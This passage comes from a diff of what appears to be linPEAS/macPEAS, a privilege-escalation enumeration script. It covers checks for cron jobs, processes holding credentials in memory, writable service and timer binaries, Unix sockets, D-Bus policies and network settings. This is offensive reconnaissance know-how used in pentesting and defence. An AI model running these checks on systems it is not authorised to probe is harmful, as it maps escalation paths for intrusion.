"s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null echo "" - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done echo "" - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services +#-- PCS) Services +if [ "$EXTRA_CHECKS" ]; then print_2title "Services" print_info "Search for outdated versions" (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" +fi - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do + if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi + fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER" | while read t; do + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" + fi + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) + printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then print_2title "Analyzing .socket files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do @@ -1809,101 +1863,128 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then fi echo "" - #-- PSC) Search HTTP sockets - print_2title "HTTP sockets" + print_2title "Unix Sockets Listening" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1 | while read s; do - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") + fi + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + fi + + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) + + # Detele repeated dockets and check permissions + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi fi done echo "" - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null + #TODO: identify allows in context="default" + done + done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi + done +else echo_not_found "busctl" +fi + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q network_information; then +print_title "Network Information" +########################################### +#---------) Network Information (---------# +########################################### + +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType echo "" +fi - #-- NI) /etc/inetd.conf +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" + +#-- NI) /etc/inetd.conf +if [ "$EXTRA_CHECKS" ]; then print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" +fi - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" - #-- NI) Neighbours +#-- NI) Neighbours +if [ "$EXTRA_CHECKS" ]; then print_2title "Networks and neighbours" if [ "$MACOS" ]; then netstat -rn 2>/dev/null @@ -1912,83 +1993,100 @@ if echo $CHECKS | grep -q Net; then fi (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null echo "" +fi - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi - #-- NI) Iptables +#-- NI) Iptables +if [ "$EXTRA_CHECKS" ]; then print_2title "Iptables rules" (timeout 1 iptables -L 